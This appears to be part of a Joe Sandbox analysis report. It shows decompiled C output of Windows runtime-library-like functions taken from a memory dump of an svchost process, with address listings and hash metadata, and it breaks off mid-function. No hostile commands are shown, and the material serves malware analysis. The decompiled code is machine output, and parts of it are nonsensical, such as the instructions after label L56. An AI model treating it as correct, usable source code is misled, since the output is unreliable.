                        Function 03052581 Relevance: 1.6, Strings: 1, Instructions: 329COMMONCrypto
                        Download Yara Rule
                        C-Code - Quality: 84%
                        			E03052581(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, signed int _a4, char _a8, signed int _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24) {
				signed int _v8;
				signed int _v16;
				unsigned int _v24;
				void* _v28;
				signed int _v32;
				unsigned int _v36;
				signed int _v37;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _t228;
				signed int _t232;
				void* _t233;
				signed int _t236;
				void* _t237;
				void* _t238;
				signed int _t245;
				signed int _t247;
				intOrPtr _t249;
				signed int _t252;
				signed int _t259;
				signed int _t262;
				signed int _t270;
				signed int _t276;
				signed int _t278;
				signed int* _t281;
				signed int* _t283;
				signed int _t284;
				unsigned int _t287;
				signed int _t291;
				signed int _t295;
				signed int _t299;
				intOrPtr _t311;
				signed int _t320;
				signed int _t322;
				signed int _t323;
				signed int _t327;
				signed int _t328;
				void* _t330;
				signed int _t331;
				signed int _t333;
				signed int _t335;
				void* _t336;
				signed int _t339;

				_t333 = _t335;
				_t336 = _t335 - 0x4c;
				_v8 =  *0x311d360 ^ _t333;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t327 = 0x311b2e8;
				_v56 = _a4;
				_v48 = __edx;
				_v60 = __ecx;
				_t287 = 0;
				_v80 = 0;
				asm("movsd");
				_v64 = 0;
				_v76 = 0;
				_v72 = 0;
				asm("movsd");
				_v44 = 0;
				_v52 = 0;
				_v68 = 0;
				asm("movsd");
				_v32 = 0;
				_v36 = 0;
				asm("movsd");
				_v16 = 0;
				_t276 = 0x48;
				_t309 = 0 | (_v24 >> 0x0000001c & 0x00000003) == 0x00000001;
				_t320 = 0;
				_v37 = _t309;
				if(_v48 <= 0) {
					L16:
					_t45 = _t276 - 0x48; // 0x0
					__eflags = _t45 - 0xfffe;
					if(_t45 > 0xfffe) {
						_t328 = 0xc0000106;
						goto L32;
					} else {
						_t327 = L03044620(_t287,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t276);
						_v52 = _t327;
						__eflags = _t327;
						if(_t327 == 0) {
							_t328 = 0xc0000017;
							goto L32;
						} else {
							 *(_t327 + 0x44) =  *(_t327 + 0x44) & 0x00000000;
							_t50 = _t327 + 0x48; // 0x48
							_t322 = _t50;
							_t309 = _v32;
							 *(_t327 + 0x3c) = _t276;
							_t278 = 0;
							 *((short*)(_t327 + 0x30)) = _v48;
							__eflags = _t309;
							if(_t309 != 0) {
								 *(_t327 + 0x18) = _t322;
								__eflags = _t309 - 0x3118478;
								 *_t327 = ((0 | _t309 == 0x03118478) - 0x00000001 & 0xfffffffb) + 7;
								E0306F3E0(_t322,  *((intOrPtr*)(_t309 + 4)),  *_t309 & 0x0000ffff);
								_t309 = _v32;
								_t336 = _t336 + 0xc;
								_t278 = 1;
								__eflags = _a8;
								_t322 = _t322 + (( *_t309 & 0x0000ffff) >> 1) * 2;
								if(_a8 != 0) {
									_t270 = E030B39F2(_t322);
									_t309 = _v32;
									_t322 = _t270;
								}
							}
							_t291 = 0;
							_v16 = 0;
							__eflags = _v48;
							if(_v48 <= 0) {
								L31:
								_t328 = _v68;
								__eflags = 0;
								 *((short*)(_t322 - 2)) = 0;
								goto L32;
							} else {
								_t276 = _t327 + _t278 * 4;
								_v56 = _t276;
								do {
									__eflags = _t309;
									if(_t309 != 0) {
										_t228 =  *(_v60 + _t291 * 4);
										__eflags = _t228;
										if(_t228 == 0) {
											goto L30;
										} else {
											__eflags = _t228 == 5;
											if(_t228 == 5) {
												goto L30;
											} else {
												goto L22;
											}
										}
									} else {
										L22:
										 *_t276 =  *(_v60 + _t291 * 4);
										 *(_t276 + 0x18) = _t322;
										_t232 =  *(_v60 + _t291 * 4);
										__eflags = _t232 - 8;
										if(_t232 > 8) {
											goto L56;
										} else {
											switch( *((intOrPtr*)(_t232 * 4 +  &M03052959))) {
												case 0:
													__ax =  *0x3118488;
													__eflags = __ax;
													if(__ax == 0) {
														goto L29;
													} else {
														__ax & 0x0000ffff = E0306F3E0(__edi,  *0x311848c, __ax & 0x0000ffff);
														__eax =  *0x3118488 & 0x0000ffff;
														goto L26;
													}
													goto L108;
												case 1:
													L45:
													E0306F3E0(_t322, _v80, _v64);
													_t265 = _v64;
													goto L26;
												case 2:
													 *0x3118480 & 0x0000ffff = E0306F3E0(__edi,  *0x3118484,  *0x3118480 & 0x0000ffff);
													__eax =  *0x3118480 & 0x0000ffff;
													__eax = ( *0x3118480 & 0x0000ffff) >> 1;
													__edi = __edi + __eax * 2;
													goto L28;
												case 3:
													__eax = _v44;
													__eflags = __eax;
													if(__eax == 0) {
														goto L29;
													} else {
														__esi = __eax + __eax;
														__eax = E0306F3E0(__edi, _v72, __esi);
														__edi = __edi + __esi;
														__esi = _v52;
														goto L27;
													}
													goto L108;
												case 4:
													_push(0x2e);
													_pop(__eax);
													 *(__esi + 0x44) = __edi;
													 *__edi = __ax;
													__edi = __edi + 4;
													_push(0x3b);
													_pop(__eax);
													 *(__edi - 2) = __ax;
													goto L29;
												case 5:
													__eflags = _v36;
													if(_v36 == 0) {
														goto L45;
													} else {
														E0306F3E0(_t322, _v76, _v36);
														_t265 = _v36;
													}
													L26:
													_t336 = _t336 + 0xc;
													_t322 = _t322 + (_t265 >> 1) * 2 + 2;
													__eflags = _t322;
													L27:
													_push(0x3b);
													_pop(_t267);
													 *((short*)(_t322 - 2)) = _t267;
													goto L28;
												case 6:
													__ebx = "\\WIw\\WIw";
													__eflags = __ebx - "\\WIw\\WIw";
													if(__ebx != "\\WIw\\WIw") {
														_push(0x3b);
														_pop(__esi);
														do {
															 *(__ebx + 8) & 0x0000ffff = __ebx + 0xa;
															E0306F3E0(__edi, __ebx + 0xa,  *(__ebx + 8) & 0x0000ffff) =  *(__ebx + 8) & 0x0000ffff;
															__eax = ( *(__ebx + 8) & 0x0000ffff) >> 1;
															__edi = __edi + __eax * 2;
															__edi = __edi + 2;
															 *(__edi - 2) = __si;
															__ebx =  *__ebx;
															__eflags = __ebx - "\\WIw\\WIw";
														} while (__ebx != "\\WIw\\WIw");
														__esi = _v52;
														__ecx = _v16;
														__edx = _v32;
													}
													__ebx = _v56;
													goto L29;
												case 7:
													 *0x3118478 & 0x0000ffff = E0306F3E0(__edi,  *0x311847c,  *0x3118478 & 0x0000ffff);
													__eax =  *0x3118478 & 0x0000ffff;
													__eax = ( *0x3118478 & 0x0000ffff) >> 1;
													__eflags = _a8;
													__edi = __edi + __eax * 2;
													if(_a8 != 0) {
														__ecx = __edi;
														__eax = E030B39F2(__ecx);
														__edi = __eax;
													}
													goto L28;
												case 8:
													__eax = 0;
													 *(__edi - 2) = __ax;
													 *0x3116e58 & 0x0000ffff = E0306F3E0(__edi,  *0x3116e5c,  *0x3116e58 & 0x0000ffff);
													 *(__esi + 0x38) = __edi;
													__eax =  *0x3116e58 & 0x0000ffff;
													__eax = ( *0x3116e58 & 0x0000ffff) >> 1;
													__edi = __edi + __eax * 2;
													__edi = __edi + 2;
													L28:
													_t291 = _v16;
													_t309 = _v32;
													L29:
													_t276 = _t276 + 4;
													__eflags = _t276;
													_v56 = _t276;
													goto L30;
											}
										}
									}
									goto L108;
									L30:
									_t291 = _t291 + 1;
									_v16 = _t291;
									__eflags = _t291 - _v48;
								} while (_t291 < _v48);
								goto L31;
							}
						}
					}
				} else {
					while(1) {
						L1:
						_t232 =  *(_v60 + _t320 * 4);
						if(_t232 > 8) {
							break;
						}
						switch( *((intOrPtr*)(_t232 * 4 +  &M03052935))) {
							case 0:
								__ax =  *0x3118488;
								__eflags = __ax;
								if(__ax != 0) {
									__eax = __ax & 0x0000ffff;
									__ebx = __ebx + 2;
									__eflags = __ebx;
									goto L53;
								}
								goto L14;
							case 1:
								L44:
								_t309 =  &_v64;
								_v80 = E03052E3E(0,  &_v64);
								_t276 = _t276 + _v64 + 2;
								goto L13;
							case 2:
								__eax =  *0x3118480 & 0x0000ffff;
								__ebx = __ebx + __eax;
								__eflags = __dl;
								if(__dl != 0) {
									__eax = 0x3118480;
									goto L80;
								}
								goto L14;
							case 3:
								__eax = E0303EEF0(0x31179a0);
								__eax =  &_v44;
								_push(__eax);
								_push(0);
								_push(0);
								_push(4);
								_push(L"PATH");
								_push(0);
								L57();
								__esi = __eax;
								_v68 = __esi;
								__eflags = __esi - 0xc0000023;
								if(__esi != 0xc0000023) {
									L10:
									__eax = E0303EB70(__ecx, 0x31179a0);
									__eflags = __esi - 0xc0000100;
									if(__esi == 0xc0000100) {
										_v44 = _v44 & 0x00000000;
										__eax = 0;
										_v68 = 0;
										goto L13;
									} else {
										__eflags = __esi;
										if(__esi < 0) {
											L32:
											_t206 = _v72;
											__eflags = _t206;
											if(_t206 != 0) {
												L030477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t206);
											}
											_t207 = _v52;
											__eflags = _t207;
											if(_t207 != 0) {
												__eflags = _t328;
												if(_t328 < 0) {
													L030477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t207);
													_t207 = 0;
												}
											}
											goto L36;
										} else {
											__eax = _v44;
											__ebx = __ebx + __eax * 2;
											__ebx = __ebx + 2;
											__eflags = __ebx;
											L13:
											_t287 = _v36;
											goto L14;
										}
									}
								} else {
									__eax = _v44;
									__ecx =  *0x3117b9c; // 0x0
									_v44 + _v44 =  *[fs:0x30];
									__ecx = __ecx + 0x180000;
									__eax = L03044620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), __ecx,  *[fs:0x30]);
									_v72 = __eax;
									__eflags = __eax;
									if(__eax == 0) {
										__eax = E0303EB70(__ecx, 0x31179a0);
										__eax = _v52;
										L36:
										_pop(_t321);
										_pop(_t329);
										__eflags = _v8 ^ _t333;
										_pop(_t277);
										return E0306B640(_t207, _t277, _v8 ^ _t333, _t309, _t321, _t329);
									} else {
										__ecx =  &_v44;
										_push(__ecx);
										_push(_v44);
										_push(__eax);
										_push(4);
										_push(L"PATH");
										_push(0);
										L57();
										__esi = __eax;
										_v68 = __eax;
										goto L10;
									}
								}
								goto L108;
							case 4:
								__ebx = __ebx + 4;
								goto L14;
							case 5:
								_t272 = _v56;
								if(_v56 != 0) {
									_t309 =  &_v36;
									_t274 = E03052E3E(_t272,  &_v36);
									_t287 = _v36;
									_v76 = _t274;
								}
								if(_t287 == 0) {
									goto L44;
								} else {
									_t276 = _t276 + 2 + _t287;
								}
								goto L14;
							case 6:
								__eax =  *0x3115764 & 0x0000ffff;
								goto L53;
							case 7:
								__eax =  *0x3118478 & 0x0000ffff;
								__ebx = __ebx + __eax;
								__eflags = _a8;
								if(_a8 != 0) {
									__ebx = __ebx + 0x16;
									__ebx = __ebx + __eax;
								}
								__eflags = __dl;
								if(__dl != 0) {
									__eax = 0x3118478;
									L80:
									_v32 = __eax;
								}
								goto L14;
							case 8:
								__eax =  *0x3116e58 & 0x0000ffff;
								__eax = ( *0x3116e58 & 0x0000ffff) + 2;
								L53:
								__ebx = __ebx + __eax;
								L14:
								_t320 = _t320 + 1;
								if(_t320 >= _v48) {
									goto L16;
								} else {
									_t309 = _v37;
									goto L1;
								}
								goto L108;
						}
					}
					L56:
					asm("int 0x29");
					asm("out 0x28, al");
					_t233 = _t232 + 0x5286603;
					asm("daa");
					_t236 = _t233 + 0x5262e03 +  *((intOrPtr*)(_t327 + 0x28)) + 0x5260503;
					_t281 = 0x25;
					 *_t281 =  *_t281 | _t236;
					_t237 = _t336 + _t233;
					_t339 = _t236;
					 *0x95b3503 =  *0x95b3503 - _t237;
					_t238 = _t237 +  *_t309;
					 *0x5288003 =  *0x5288003 - _t238;
					_t330 = _t327 + _t327;
					asm("daa");
					_pop(_t283);
					 *_t283 =  *_t283 | _t238 + 0xa4f7b06;
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					_push(0x20);
					_push(0x30fff00);
					E0307D08C(_t283, _t322, _t330);
					_v44 =  *[fs:0x18];
					_t323 = 0;
					 *_a24 = 0;
					_t284 = _a12;
					__eflags = _t284;
					if(_t284 == 0) {
						_t245 = 0xc0000100;
					} else {
						_v8 = 0;
						_t331 = 0xc0000100;
						_v52 = 0xc0000100;
						_t247 = 4;
						while(1) {
							_v40 = _t247;
							__eflags = _t247;
							if(_t247 == 0) {
								break;
							}
							_t299 = _t247 * 0xc;
							_v48 = _t299;
							__eflags = _t284 -  *((intOrPtr*)(_t299 + 0x3001664));
							if(__eflags <= 0) {
								if(__eflags == 0) {
									_t262 = E0306E5C0(_a8,  *((intOrPtr*)(_t299 + 0x3001668)), _t284);
									_t339 = _t339 + 0xc;
									__eflags = _t262;
									if(__eflags == 0) {
										_t331 = E030A51BE(_t284,  *((intOrPtr*)(_v48 + 0x300166c)), _a16, _t323, _t331, __eflags, _a20, _a24);
										_v52 = _t331;
										break;
									} else {
										_t247 = _v40;
										goto L62;
									}
									goto L70;
								} else {
									L62:
									_t247 = _t247 - 1;
									continue;
								}
							}
							break;
						}
						_v32 = _t331;
						__eflags = _t331;
						if(_t331 < 0) {
							__eflags = _t331 - 0xc0000100;
							if(_t331 == 0xc0000100) {
								_t295 = _a4;
								__eflags = _t295;
								if(_t295 != 0) {
									_v36 = _t295;
									__eflags =  *_t295 - _t323;
									if( *_t295 == _t323) {
										_t331 = 0xc0000100;
										goto L76;
									} else {
										_t311 =  *((intOrPtr*)(_v44 + 0x30));
										_t249 =  *((intOrPtr*)(_t311 + 0x10));
										__eflags =  *((intOrPtr*)(_t249 + 0x48)) - _t295;
										if( *((intOrPtr*)(_t249 + 0x48)) == _t295) {
											__eflags =  *(_t311 + 0x1c);
											if( *(_t311 + 0x1c) == 0) {
												L106:
												_t331 = E03052AE4( &_v36, _a8, _t284, _a16, _a20, _a24);
												_v32 = _t331;
												__eflags = _t331 - 0xc0000100;
												if(_t331 != 0xc0000100) {
													goto L69;
												} else {
													_t323 = 1;
													_t295 = _v36;
													goto L75;
												}
											} else {
												_t252 = E03036600( *(_t311 + 0x1c));
												__eflags = _t252;
												if(_t252 != 0) {
													goto L106;
												} else {
													_t295 = _a4;
													goto L75;
												}
											}
										} else {
											L75:
											_t331 = E03052C50(_t295, _a8, _t284, _a16, _a20, _a24, _t323);
											L76:
											_v32 = _t331;
											goto L69;
										}
									}
									goto L108;
								} else {
									E0303EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
									_v8 = 1;
									_v36 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v44 + 0x30)) + 0x10)) + 0x48));
									_t331 = _a24;
									_t259 = E03052AE4( &_v36, _a8, _t284, _a16, _a20, _t331);
									_v32 = _t259;
									__eflags = _t259 - 0xc0000100;
									if(_t259 == 0xc0000100) {
										_v32 = E03052C50(_v36, _a8, _t284, _a16, _a20, _t331, 1);
									}
									_v8 = _t323;
									E03052ACB();
								}
							}
						}
						L69:
						_v8 = 0xfffffffe;
						_t245 = _t331;
					}
					L70:
					return E0307D0D1(_t245);
				}
				L108:
			}























































                        0x03052584
                        0x03052586
                        0x03052590
                        0x03052596
                        0x03052597
                        0x03052598
                        0x03052599
                        0x0305259e
                        0x030525a4
                        0x030525a9
                        0x030525ac
                        0x030525ae
                        0x030525b1
                        0x030525b2
                        0x030525b5
                        0x030525b8
                        0x030525bb
                        0x030525bc
                        0x030525bf
                        0x030525c2
                        0x030525c5
                        0x030525c6
                        0x030525cb
                        0x030525ce
                        0x030525d8
                        0x030525dd
                        0x030525de
                        0x030525e1
                        0x030525e3
                        0x030525e9
                        0x030526da
                        0x030526da
                        0x030526dd
                        0x030526e2
                        0x03095b56
                        0x00000000
                        0x030526e8
                        0x030526f9
                        0x030526fb
                        0x030526fe
                        0x03052700
                        0x03095b60
                        0x00000000
                        0x03052706
                        0x03052706
                        0x0305270a
                        0x0305270a
                        0x0305270d
                        0x03052713
                        0x03052716
                        0x03052718
                        0x0305271c
                        0x0305271e
                        0x03095b6c
                        0x03095b6f
                        0x03095b7f
                        0x03095b89
                        0x03095b8e
                        0x03095b93
                        0x03095b96
                        0x03095b9c
                        0x03095ba0
                        0x03095ba3
                        0x03095bab
                        0x03095bb0
                        0x03095bb3
                        0x03095bb3
                        0x03095ba3
                        0x03052724
                        0x03052726
                        0x03052729
                        0x0305272c
                        0x0305279d
                        0x0305279d
                        0x030527a0
                        0x030527a2
                        0x00000000
                        0x0305272e
                        0x0305272e
                        0x03052731
                        0x03052734
                        0x03052734
                        0x03052736
                        0x03095bc1
                        0x03095bc1
                        0x03095bc4
                        0x00000000
                        0x03095bca
                        0x03095bca
                        0x03095bcd
                        0x00000000
                        0x03095bd3
                        0x00000000
                        0x03095bd3
                        0x03095bcd
                        0x0305273c
                        0x0305273c
                        0x03052742
                        0x03052747
                        0x0305274a
                        0x0305274d
                        0x03052750
                        0x00000000
                        0x03052756
                        0x03052756
                        0x00000000
                        0x03052902
                        0x03052908
                        0x0305290b
                        0x00000000
                        0x03052911
                        0x0305291c
                        0x03052921
                        0x00000000
                        0x03052921
                        0x00000000
                        0x00000000
                        0x03052880
                        0x03052887
                        0x0305288c
                        0x00000000
                        0x00000000
                        0x03052805
                        0x0305280a
                        0x03052814
                        0x03052816
                        0x00000000
                        0x00000000
                        0x0305281e
                        0x03052821
                        0x03052823
                        0x00000000
                        0x03052829
                        0x03052829
                        0x03052831
                        0x0305283c
                        0x0305283e
                        0x00000000
                        0x0305283e
                        0x00000000
                        0x00000000
                        0x0305284e
                        0x03052850
                        0x03052851
                        0x03052854
                        0x03052857
                        0x0305285a
                        0x0305285c
                        0x0305285d
                        0x00000000
                        0x00000000
                        0x0305275d
                        0x03052761
                        0x00000000
                        0x03052767
                        0x0305276e
                        0x03052773
                        0x03052773
                        0x03052776
                        0x03052778
                        0x0305277e
                        0x0305277e
                        0x03052781
                        0x03052781
                        0x03052783
                        0x03052784
                        0x00000000
                        0x00000000
                        0x03095bd8
                        0x03095bde
                        0x03095be4
                        0x03095be6
                        0x03095be8
                        0x03095be9
                        0x03095bee
                        0x03095bf8
                        0x03095bff
                        0x03095c01
                        0x03095c04
                        0x03095c07
                        0x03095c0b
                        0x03095c0d
                        0x03095c0d
                        0x03095c15
                        0x03095c18
                        0x03095c1b
                        0x03095c1b
                        0x03095c1e
                        0x00000000
                        0x00000000
                        0x030528c3
                        0x030528c8
                        0x030528d2
                        0x030528d4
                        0x030528d8
                        0x030528db
                        0x03095c26
                        0x03095c28
                        0x03095c2d
                        0x03095c2d
                        0x00000000
                        0x00000000
                        0x03095c34
                        0x03095c36
                        0x03095c49
                        0x03095c4e
                        0x03095c54
                        0x03095c5b
                        0x03095c5d
                        0x03095c60
                        0x03052788
                        0x03052788
                        0x0305278b
                        0x0305278e
                        0x0305278e
                        0x0305278e
                        0x03052791
                        0x00000000
                        0x00000000
                        0x03052756
                        0x03052750
                        0x00000000
                        0x03052794
                        0x03052794
                        0x03052795
                        0x03052798
                        0x03052798
                        0x00000000
                        0x03052734
                        0x0305272c
                        0x03052700
                        0x030525ef
                        0x030525ef
                        0x030525ef
                        0x030525f2
                        0x030525f8
                        0x00000000
                        0x00000000
                        0x030525fe
                        0x00000000
                        0x030528e6
                        0x030528ec
                        0x030528ef
                        0x030528f5
                        0x030528f8
                        0x030528f8
                        0x00000000
                        0x030528f8
                        0x00000000
                        0x00000000
                        0x03052866
                        0x03052866
                        0x03052876
                        0x03052879
                        0x00000000
                        0x00000000
                        0x030527e0
                        0x030527e7
                        0x030527e9
                        0x030527eb
                        0x03095afd
                        0x00000000
                        0x03095afd
                        0x00000000
                        0x00000000
                        0x03052633
                        0x03052638
                        0x0305263b
                        0x0305263c
                        0x0305263e
                        0x03052640
                        0x03052642
                        0x03052647
                        0x03052649
                        0x0305264e
                        0x03052650
                        0x03052653
                        0x03052659
                        0x030526a2
                        0x030526a7
                        0x030526ac
                        0x030526b2
                        0x03095b11
                        0x03095b15
                        0x03095b17
                        0x00000000
                        0x030526b8
                        0x030526b8
                        0x030526ba
                        0x030527a6
                        0x030527a6
                        0x030527a9
                        0x030527ab
                        0x030527b9
                        0x030527b9
                        0x030527be
                        0x030527c1
                        0x030527c3
                        0x030527c5
                        0x030527c7
                        0x03095c74
                        0x03095c79
                        0x03095c79
                        0x030527c7
                        0x00000000
                        0x030526c0
                        0x030526c0
                        0x030526c3
                        0x030526c6
                        0x030526c6
                        0x030526c9
                        0x030526c9
                        0x00000000
                        0x030526c9
                        0x030526ba
                        0x0305265b
                        0x0305265b
                        0x0305265e
                        0x03052667
                        0x0305266d
                        0x03052677
                        0x0305267c
                        0x0305267f
                        0x03052681
                        0x03095b49
                        0x03095b4e
                        0x030527cd
                        0x030527d0
                        0x030527d1
                        0x030527d2
                        0x030527d4
                        0x030527dd
                        0x03052687
                        0x03052687
                        0x0305268a
                        0x0305268b
                        0x0305268e
                        0x0305268f
                        0x03052691
                        0x03052696
                        0x03052698
                        0x0305269d
                        0x0305269f
                        0x00000000
                        0x0305269f
                        0x03052681
                        0x00000000
                        0x00000000
                        0x03052846
                        0x00000000
                        0x00000000
                        0x03052605
                        0x0305260a
                        0x0305260c
                        0x03052611
                        0x03052616
                        0x03052619
                        0x03052619
                        0x0305261e
                        0x00000000
                        0x03052624
                        0x03052627
                        0x03052627
                        0x00000000
                        0x00000000
                        0x03095b1f
                        0x00000000
                        0x00000000
                        0x03052894
                        0x0305289b
                        0x0305289d
                        0x030528a1
                        0x03095b2b
                        0x03095b2e
                        0x03095b2e
                        0x030528a7
                        0x030528a9
                        0x03095b04
                        0x03095b09
                        0x03095b09
                        0x03095b09
                        0x00000000
                        0x00000000
                        0x03095b35
                        0x03095b3c
                        0x030528fb
                        0x030528fb
                        0x030526cc
                        0x030526cc
                        0x030526d0
                        0x00000000
                        0x030526d2
                        0x030526d2
                        0x00000000
                        0x030526d2
                        0x00000000
                        0x00000000
                        0x030525fe
                        0x0305292d
                        0x03052930
                        0x03052935
                        0x03052937
                        0x0305293e
                        0x03052947
                        0x0305294e
                        0x0305294f
                        0x03052951
                        0x03052951
                        0x03052952
                        0x03052958
                        0x0305295a
                        0x03052960
                        0x03052962
                        0x03052972
                        0x03052973
                        0x0305297e
                        0x0305297f
                        0x03052980
                        0x03052981
                        0x03052982
                        0x03052983
                        0x03052984
                        0x03052985
                        0x03052986
                        0x03052987
                        0x03052988
                        0x03052989
                        0x0305298a
                        0x0305298b
                        0x0305298c
                        0x0305298d
                        0x0305298e
                        0x0305298f
                        0x03052990
                        0x03052992
                        0x03052997
                        0x030529a3
                        0x030529a6
                        0x030529ab
                        0x030529ad
                        0x030529b0
                        0x030529b2
                        0x03095c80
                        0x030529b8
                        0x030529b8
                        0x030529bb
                        0x030529c0
                        0x030529c5
                        0x030529c6
                        0x030529c6
                        0x030529c9
                        0x030529cb
                        0x00000000
                        0x00000000
                        0x030529cd
                        0x030529d0
                        0x030529d9
                        0x030529db
                        0x030529dd
                        0x03052a7f
                        0x03052a84
                        0x03052a87
                        0x03052a89
                        0x03095ca1
                        0x03095ca3
                        0x00000000
                        0x03052a8f
                        0x03052a8f
                        0x00000000
                        0x03052a8f
                        0x00000000
                        0x030529e3
                        0x030529e3
                        0x030529e3
                        0x00000000
                        0x030529e3
                        0x030529dd
                        0x00000000
                        0x030529db
                        0x030529e6
                        0x030529e9
                        0x030529eb
                        0x030529ed
                        0x030529f3
                        0x030529f5
                        0x030529f8
                        0x030529fa
                        0x03052a97
                        0x03052a9a
                        0x03052a9d
                        0x03052add
                        0x00000000
                        0x03052a9f
                        0x03052aa2
                        0x03052aa5
                        0x03052aa8
                        0x03052aab
                        0x03095cab
                        0x03095caf
                        0x03095cc5
                        0x03095cda
                        0x03095cdc
                        0x03095cdf
                        0x03095ce5
                        0x00000000
                        0x03095ceb
                        0x03095ced
                        0x03095cee
                        0x00000000
                        0x03095cee
                        0x03095cb1
                        0x03095cb4
                        0x03095cb9
                        0x03095cbb
                        0x00000000
                        0x03095cbd
                        0x03095cbd
                        0x00000000
                        0x03095cbd
                        0x03095cbb
                        0x03052ab1
                        0x03052ab1
                        0x03052ac4
                        0x03052ac6
                        0x03052ac6
                        0x00000000
                        0x03052ac6
                        0x03052aab
                        0x00000000
                        0x03052a00
                        0x03052a09
                        0x03052a0e
                        0x03052a21
                        0x03052a24
                        0x03052a35
                        0x03052a3a
                        0x03052a3d
                        0x03052a42
                        0x03052a59
                        0x03052a59
                        0x03052a5c
                        0x03052a5f
                        0x03052a5f
                        0x030529fa
                        0x030529f3
                        0x03052a64
                        0x03052a64
                        0x03052a6b
                        0x03052a6b
                        0x03052a6d
                        0x03052a72
                        0x03052a72
                        0x00000000

                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmpDownload File
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Similarity
                        • API ID:
                        • String ID: PATH
                        • API String ID: 0-1036084923
                        • Opcode ID: 6ac34656ab00b2ecb44ebae63dd2b5157922adcb6c5c3abec833a290bfe9cc5c
                        • Instruction ID: d9958caca75ca107907a0cb8aaf93bc50bb9649b692a65f8851c1517acd4ad6e
                        • Opcode Fuzzy Hash: 6ac34656ab00b2ecb44ebae63dd2b5157922adcb6c5c3abec833a290bfe9cc5c
                        • Instruction Fuzzy Hash: 5AC17CB5E022199BDB15DF99D980BEFB7B9FF89700F084829F801BB250D734A941CB64
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0305FAB0 Relevance: 1.6, Strings: 1, Instructions: 306COMMON
                        Download Yara Rule
                        C-Code - Quality: 80%
                        			E0305FAB0(void* __ebx, void* __esi, signed int _a8, signed int _a12) {
				char _v5;
				signed int _v8;
				signed int _v12;
				char _v16;
				char _v17;
				char _v20;
				signed int _v24;
				char _v28;
				char _v32;
				signed int _v40;
				void* __ecx;
				void* __edi;
				void* __ebp;
				signed int _t73;
				intOrPtr* _t75;
				signed int _t77;
				signed int _t79;
				signed int _t81;
				intOrPtr _t83;
				intOrPtr _t85;
				intOrPtr _t86;
				signed int _t91;
				signed int _t94;
				signed int _t95;
				signed int _t96;
				signed int _t106;
				signed int _t108;
				signed int _t114;
				signed int _t116;
				signed int _t118;
				signed int _t122;
				signed int _t123;
				void* _t129;
				signed int _t130;
				void* _t132;
				intOrPtr* _t134;
				signed int _t138;
				signed int _t141;
				signed int _t147;
				intOrPtr _t153;
				signed int _t154;
				signed int _t155;
				signed int _t170;
				void* _t174;
				signed int _t176;
				signed int _t177;

				_t129 = __ebx;
				_push(_t132);
				_push(__esi);
				_t174 = _t132;
				_t73 =  !( *( *(_t174 + 0x18)));
				if(_t73 >= 0) {
					L5:
					return _t73;
				} else {
					E0303EEF0(0x3117b60);
					_t134 =  *0x3117b84; // 0x77497b80
					_t2 = _t174 + 0x24; // 0x24
					_t75 = _t2;
					if( *_t134 != 0x3117b80) {
						_push(3);
						asm("int 0x29");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(0x3117b60);
						_t170 = _v8;
						_v28 = 0;
						_v40 = 0;
						_v24 = 0;
						_v17 = 0;
						_v32 = 0;
						__eflags = _t170 & 0xffff7cf2;
						if((_t170 & 0xffff7cf2) != 0) {
							L43:
							_t77 = 0xc000000d;
						} else {
							_t79 = _t170 & 0x0000000c;
							__eflags = _t79;
							if(_t79 != 0) {
								__eflags = _t79 - 0xc;
								if(_t79 == 0xc) {
									goto L43;
								} else {
									goto L9;
								}
							} else {
								_t170 = _t170 | 0x00000008;
								__eflags = _t170;
								L9:
								_t81 = _t170 & 0x00000300;
								__eflags = _t81 - 0x300;
								if(_t81 == 0x300) {
									goto L43;
								} else {
									_t138 = _t170 & 0x00000001;
									__eflags = _t138;
									_v24 = _t138;
									if(_t138 != 0) {
										__eflags = _t81;
										if(_t81 != 0) {
											goto L43;
										} else {
											goto L11;
										}
									} else {
										L11:
										_push(_t129);
										_t77 = E03036D90( &_v20);
										_t130 = _t77;
										__eflags = _t130;
										if(_t130 >= 0) {
											_push(_t174);
											__eflags = _t170 & 0x00000301;
											if((_t170 & 0x00000301) == 0) {
												_t176 = _a8;
												__eflags = _t176;
												if(__eflags == 0) {
													L64:
													_t83 =  *[fs:0x18];
													_t177 = 0;
													__eflags =  *(_t83 + 0xfb8);
													if( *(_t83 + 0xfb8) != 0) {
														E030376E2( *((intOrPtr*)( *[fs:0x18] + 0xfb8)));
														 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = 0;
													}
													 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = _v12;
													goto L15;
												} else {
													asm("sbb edx, edx");
													_t114 = E030C8938(_t130, _t176, ( ~(_t170 & 4) & 0xffffffaf) + 0x55, _t170, _t176, __eflags);
													__eflags = _t114;
													if(_t114 < 0) {
